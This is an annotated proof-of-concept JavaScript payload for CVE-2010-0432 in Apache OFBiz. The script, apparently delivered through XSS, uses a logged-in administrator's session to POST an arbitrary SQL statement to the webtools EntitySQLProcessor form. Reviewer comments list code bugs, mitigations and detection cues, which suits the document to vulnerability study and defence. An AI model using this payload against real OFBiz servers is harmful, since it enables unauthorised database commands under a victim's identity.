/* Apache OFBiz SQL Remote Execution PoC Payload.
   CVE: CVE-2010-0432
   By: Lucas Apa ( lucas -at- bonsai-sec.com ).
   Bonsai Information Security
   http://www.bonsai-sec.com/ */

// Reviewer notes (defensive reading of this PoC):
//  - The script only makes sense when it runs inside the browser of a user who
//    is already logged in to the OFBiz webtools console: it reads that user's
//    document.cookie and POSTs to the EntitySQLProcessor form, so the victim's
//    session is what authorises the SQL submission. That requires the script to
//    execute in the webtools origin, presumably via the XSS this CVE covers.
//  - Server-side mitigations: apply the vendor fix, expose /webtools/ only to
//    trusted administrative networks, and protect state-changing webtools forms
//    with an anti-CSRF token so a session cookie alone cannot submit them.
//  - Detection: POSTs to /webtools/control/EntitySQLProcessor carrying
//    unexpected sqlCommand values, or arriving with a Referer/Origin other than
//    the webtools UI, are worth alerting on in application and proxy logs.

// Placeholder for the SQL statement the PoC places in the `sqlCommand` field.
var cmd = 'command';

// Obtain an XMLHttpRequest-like object, trying the legacy ActiveX constructors
// and window.createRequest as fallbacks; xmlhttp stays false if all fail.
var xmlhttp=false;
try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
  try {
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  } catch (E) {
    xmlhttp = false;
  }
}
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
  try {
    xmlhttp = new XMLHttpRequest();
  } catch (e) {
    xmlhttp=false;
  }
}
if (!xmlhttp && window.createRequest) {
  try {
    xmlhttp = window.createRequest();
  } catch (e) {
    xmlhttp=false;
  }
}
// NOTE(review): nothing checks that xmlhttp is truthy past this point; if every
// constructor above failed, the .open() call below throws.
// The target is a private-range lab host; the URL literal carries a leading space.
xmlhttp.open("POST", " https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);
xmlhttp.onreadystatechange=function() {
  // NOTE(review): `xmlhttp2` is never declared anywhere in this script, so this
  // handler raises a ReferenceError when it fires; by then the request has
  // already been sent, so the handler only affects reading the response.
  if (xmlhttp2.readyState==4) {
    //alert(xmlhttp.responseText)
  }
}
// Reads the current user's cookies, i.e. the authenticated webtools session.
var cookie = unescape(document.cookie);
xmlhttp.setRequestHeader("content-type", "application/x-www-form-urlencoded");
// NOTE(review): browsers treat "cookie" as a forbidden request header and drop
// this call; the session cookie is attached automatically because the request
// is same-origin. This is why the payload must run in the victim's origin.
xmlhttp.setRequestHeader("cookie", cookie);
// E4X XML literals (a legacy SpiderMonkey extension): .toString() of the CDATA
// element yields its text, so these two lines are just string constants for the
// form body, mirroring the fields of the EntitySQLProcessor page itself.
var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
// The statement is concatenated into the form body as-is (no URL-encoding).
var post_data = str1+cmd+str2;
xmlhttp.send(post_data);